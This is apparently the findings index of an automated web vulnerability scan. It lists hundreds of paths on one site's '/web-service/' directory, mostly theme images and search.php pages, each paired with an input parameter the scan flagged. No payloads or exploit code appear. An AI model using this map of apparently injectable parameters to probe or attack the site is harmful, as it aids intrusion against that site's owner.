/web-service/domain-names/themes/ [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/ [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/ [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/ [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/ [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/ [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 7]
/web-service/domain-names/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]
/web-service/domain-names/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]
/web-service/domain-names/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 7]
/web-service/domain-names/themes/kosmos/images/rating/search.php [Submit3 parameter]
/web-service/domain-names/themes/kosmos/images/rating/search.php [keyword parameter]
/web-service/domain-names/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/rating/search.php [opt parameter]
/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 7]
/web-service/domain-names/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 7]
/web-service/domain-names/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/review/search.php [REST URL parameter 7]
/web-service/domain-names/themes/kosmos/images/review/search.php [Submit3 parameter]
/web-service/domain-names/themes/kosmos/images/review/search.php [keyword parameter]
/web-service/domain-names/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/review/search.php [opt parameter]
/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 6]
/web-service/domain-names/themes/kosmos/images/search.php [Submit3 parameter]
/web-service/domain-names/themes/kosmos/images/search.php [keyword parameter]
/web-service/domain-names/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/images/search.php [opt parameter]
/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 1]
/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 2]
/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 3]
/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 4]
/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 5]
/web-service/domain-names/themes/kosmos/search.php [Submit3 parameter]
/web-service/domain-names/themes/kosmos/search.php [keyword parameter]
/web-service/domain-names/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/kosmos/search.php [opt parameter]
/web-service/domain-names/themes/search.php [REST URL parameter 1]
/web-service/domain-names/themes/search.php [REST URL parameter 2]
/web-service/domain-names/themes/search.php [REST URL parameter 3]
/web-service/domain-names/themes/search.php [REST URL parameter 4]
/web-service/domain-names/themes/search.php [Submit3 parameter]
/web-service/domain-names/themes/search.php [keyword parameter]
/web-service/domain-names/themes/search.php [name of an arbitrarily supplied request parameter]
/web-service/domain-names/themes/search.php [opt parameter]
/web-service/googlepr.php [REST URL parameter 1]
/web-service/googlepr.php [REST URL parameter 2]
/web-service/googlepr.php [link_id parameter]
/web-service/googlepr.php [name of an arbitrarily supplied request parameter]
/web-service/more2.html [REST URL parameter 1]
/web-service/more2.html [REST URL parameter 2]
/web-service/other/ [REST URL parameter 1]
/web-service/other/ [REST URL parameter 2]
/web-service/other/ [REST URL parameter 2]
/web-service/other/ [name of an arbitrarily supplied request parameter]
/web-service/other/ [select parameter]
/web-service/other/googlepr.php [REST URL parameter 1]
/web-service/other/googlepr.php [REST URL parameter 2]
/web-service/other/googlepr.php [REST URL parameter 3]
/web-service/other/googlepr.php [link_id parameter]
/web-service/other/googlepr.php [name of an arbitrarily supplied request parameter]
/web-service/other/search.php [REST URL parameter 1]
/web-service/other/search.php [REST URL parameter 2]
/web-service/other/search.php [REST URL parameter 3]
/web-service/other/search.php [Submit3 parameter]
/web-service/other/search.php [cat parameter]
/web-service/other/search.php [cat parameter]
/web-service/other/search.php [keyword parameter]
/web-service/other/search.php [name of an arbitrarily supplied request parameter]
/web-service/other/search.php [opt parameter]
/web-service/other/themes/ [REST URL parameter 1]
/web-service/other/themes/ [REST URL parameter 2]
/web-service/other/themes/ [REST URL parameter 3]
/web-service/other/themes/ [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/ [REST URL parameter 1]
/web-service/other/themes/kosmos/ [REST URL parameter 2]
/web-service/other/themes/kosmos/ [REST URL parameter 3]
/web-service/other/themes/kosmos/ [REST URL parameter 4]
/web-service/other/themes/kosmos/ [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/ [REST URL parameter 1]
/web-service/other/themes/kosmos/images/ [REST URL parameter 2]
/web-service/other/themes/kosmos/images/ [REST URL parameter 3]
/web-service/other/themes/kosmos/images/ [REST URL parameter 4]
/web-service/other/themes/kosmos/images/ [REST URL parameter 5]
/web-service/other/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 1]
/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 2]
/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 3]
/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 4]
/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 5]
/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 6]
/web-service/other/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 1]
/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 2]
/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 3]
/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 4]
/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 5]
/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 6]
/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 7]
/web-service/other/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 1]
/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 2]
/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 3]
/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 4]
/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 5]
/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 6]
/web-service/other/themes/kosmos/images/rating/3.gif [REST URL parameter 7]
/web-service/other/themes/kosmos/images/rating/3.gif [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 1]
/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 2]
/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 3]
/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 4]
/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 5]
/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 6]
/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 7]
/web-service/other/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 1]
/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 2]
/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 3]
/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 4]
/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 5]
/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 6]
/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 7]
/web-service/other/themes/kosmos/images/rating/search.php [Submit3 parameter]
/web-service/other/themes/kosmos/images/rating/search.php [keyword parameter]
/web-service/other/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/rating/search.php [opt parameter]
/web-service/other/themes/kosmos/images/review/ [REST URL parameter 1]
/web-service/other/themes/kosmos/images/review/ [REST URL parameter 2]
/web-service/other/themes/kosmos/images/review/ [REST URL parameter 3]
/web-service/other/themes/kosmos/images/review/ [REST URL parameter 4]
/web-service/other/themes/kosmos/images/review/ [REST URL parameter 5]
/web-service/other/themes/kosmos/images/review/ [REST URL parameter 6]
/web-service/other/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 1]
/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 2]
/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 3]
/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 4]
/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 5]
/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 6]
/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 7]
/web-service/other/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 1]
/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 2]
/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 3]
/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 4]
/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 5]
/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 6]
/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 7]
/web-service/other/themes/kosmos/images/review/search.php [Submit3 parameter]
/web-service/other/themes/kosmos/images/review/search.php [keyword parameter]
/web-service/other/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/review/search.php [opt parameter]
/web-service/other/themes/kosmos/images/search.php [REST URL parameter 1]
/web-service/other/themes/kosmos/images/search.php [REST URL parameter 2]
/web-service/other/themes/kosmos/images/search.php [REST URL parameter 3]
/web-service/other/themes/kosmos/images/search.php [REST URL parameter 4]
/web-service/other/themes/kosmos/images/search.php [REST URL parameter 5]
/web-service/other/themes/kosmos/images/search.php [REST URL parameter 6]
/web-service/other/themes/kosmos/images/search.php [Submit3 parameter]
/web-service/other/themes/kosmos/images/search.php [keyword parameter]
/web-service/other/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/images/search.php [opt parameter]
/web-service/other/themes/kosmos/search.php [REST URL parameter 1]
/web-service/other/themes/kosmos/search.php [REST URL parameter 2]
/web-service/other/themes/kosmos/search.php [REST URL parameter 3]
/web-service/other/themes/kosmos/search.php [REST URL parameter 4]
/web-service/other/themes/kosmos/search.php [REST URL parameter 5]
/web-service/other/themes/kosmos/search.php [Submit3 parameter]
/web-service/other/themes/kosmos/search.php [keyword parameter]
/web-service/other/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]
/web-service/other/themes/kosmos/search.php [opt parameter]
/web-service/other/themes/search.php [REST URL parameter 1]
/web-service/other/themes/search.php [REST URL parameter 2]
/web-service/other/themes/search.php [REST URL parameter 3]
/web-service/other/themes/search.php [REST URL parameter 4]
/web-service/other/themes/search.php [Submit3 parameter]
/web-service/other/themes/search.php [keyword parameter]
/web-service/other/themes/search.php [name of an arbitrarily supplied request parameter]
/web-service/other/themes/search.php [opt parameter]
/web-service/search.php [REST URL parameter 1]
/web-service/search.php [REST URL parameter 1]
/web-service/search.php [REST URL parameter 2]
/web-service/search.php [REST URL parameter 2]
/web-service/search.php [Submit3 parameter]
/web-service/search.php [Submit3 parameter]
/web-service/search.php [cat parameter]
/web-service/search.php [cat parameter]
/web-service/search.php [keyword parameter]
/web-service/search.php [keyword parameter]
/web-service/search.php [name of an arbitrarily supplied request parameter]
/web-service/search.php [name of an arbitrarily supplied request parameter]
/web-service/search.php [name of an arbitrarily supplied request parameter]
/web-service/search.php [opt parameter]
/web-service/search.php [opt parameter]
/web-service/search.php [select parameter]
/web-service/search.php [select parameter]
/web-service/software-scripts/ [REST URL parameter 1]
/web-service/software-scripts/ [REST URL parameter 1]
/web-service/software-scripts/ [REST URL parameter 2]
/web-service/software-scripts/ [REST URL parameter 2]
/web-service/software-scripts/ [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/ [select parameter]
/web-service/software-scripts/googlepr.php [REST URL parameter 1]
/web-service/software-scripts/googlepr.php [REST URL parameter 2]
/web-service/software-scripts/googlepr.php [REST URL parameter 3]
/web-service/software-scripts/googlepr.php [link_id parameter]
/web-service/software-scripts/googlepr.php [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/search.php [REST URL parameter 1]
/web-service/software-scripts/search.php [REST URL parameter 2]
/web-service/software-scripts/search.php [REST URL parameter 3]
/web-service/software-scripts/search.php [Submit3 parameter]
/web-service/software-scripts/search.php [cat parameter]
/web-service/software-scripts/search.php [cat parameter]
/web-service/software-scripts/search.php [keyword parameter]
/web-service/software-scripts/search.php [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/search.php [opt parameter]
/web-service/software-scripts/themes/ [REST URL parameter 1]
/web-service/software-scripts/themes/ [REST URL parameter 2]
/web-service/software-scripts/themes/ [REST URL parameter 3]
/web-service/software-scripts/themes/ [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/ [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/ [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/ [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/ [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/ [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 5]
/web-service/software-scripts/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 5]
/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 6]
/web-service/software-scripts/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]
/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]
/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]
/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 5]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 6]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 7]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [Submit3 parameter]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [keyword parameter]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/images/rating/search.php [opt parameter]
/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 5]
/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 6]
/web-service/software-scripts/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 5]
/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 6]
/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 7]
/web-service/software-scripts/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 5]
/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 6]
/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 7]
/web-service/software-scripts/themes/kosmos/images/review/search.php [Submit3 parameter]
/web-service/software-scripts/themes/kosmos/images/review/search.php [keyword parameter]
/web-service/software-scripts/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/images/review/search.php [opt parameter]
/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 5]
/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 6]
/web-service/software-scripts/themes/kosmos/images/search.php [Submit3 parameter]
/web-service/software-scripts/themes/kosmos/images/search.php [keyword parameter]
/web-service/software-scripts/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/images/search.php [opt parameter]
/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 1]
/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 2]
/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 3]
/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 4]
/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 5]
/web-service/software-scripts/themes/kosmos/search.php [Submit3 parameter]
/web-service/software-scripts/themes/kosmos/search.php [keyword parameter]
/web-service/software-scripts/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/kosmos/search.php [opt parameter]
/web-service/software-scripts/themes/search.php [REST URL parameter 1]
/web-service/software-scripts/themes/search.php [REST URL parameter 2]
/web-service/software-scripts/themes/search.php [REST URL parameter 3]
/web-service/software-scripts/themes/search.php [REST URL parameter 4]
/web-service/software-scripts/themes/search.php [Submit3 parameter]
/web-service/software-scripts/themes/search.php [keyword parameter]
/web-service/software-scripts/themes/search.php [name of an arbitrarily supplied request parameter]
/web-service/software-scripts/themes/search.php [opt parameter]
/web-service/themes/ [REST URL parameter 1]
/web-service/themes/ [REST URL parameter 2]
/web-service/themes/ [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/ [REST URL parameter 1]
/web-service/themes/kosmos/ [REST URL parameter 2]
/web-service/themes/kosmos/ [REST URL parameter 3]
/web-service/themes/kosmos/ [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/ [REST URL parameter 1]
/web-service/themes/kosmos/images/ [REST URL parameter 2]
/web-service/themes/kosmos/images/ [REST URL parameter 3]
/web-service/themes/kosmos/images/ [REST URL parameter 4]
/web-service/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/folder.gif [REST URL parameter 1]
/web-service/themes/kosmos/images/folder.gif [REST URL parameter 2]
/web-service/themes/kosmos/images/folder.gif [REST URL parameter 3]
/web-service/themes/kosmos/images/folder.gif [REST URL parameter 4]
/web-service/themes/kosmos/images/folder.gif [REST URL parameter 5]
/web-service/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/rating/ [REST URL parameter 1]
/web-service/themes/kosmos/images/rating/ [REST URL parameter 2]
/web-service/themes/kosmos/images/rating/ [REST URL parameter 3]
/web-service/themes/kosmos/images/rating/ [REST URL parameter 4]
/web-service/themes/kosmos/images/rating/ [REST URL parameter 5]
/web-service/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 1]
/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 2]
/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 3]
/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 4]
/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 5]
/web-service/themes/kosmos/images/rating/0.gif [REST URL parameter 6]
/web-service/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 1]
/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 2]
/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 3]
/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 4]
/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 5]
/web-service/themes/kosmos/images/rating/2half.gif [REST URL parameter 6]
/web-service/themes/kosmos/images/rating/2half.gif [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 1]
/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 2]
/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 3]
/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 4]
/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 5]
/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 6]
/web-service/themes/kosmos/images/rating/3.gif [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]
/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]
/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]
/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]
/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]
/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]
/web-service/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]
/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]
/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]
/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]
/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]
/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]
/web-service/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 1]
/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 2]
/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 3]
/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 4]
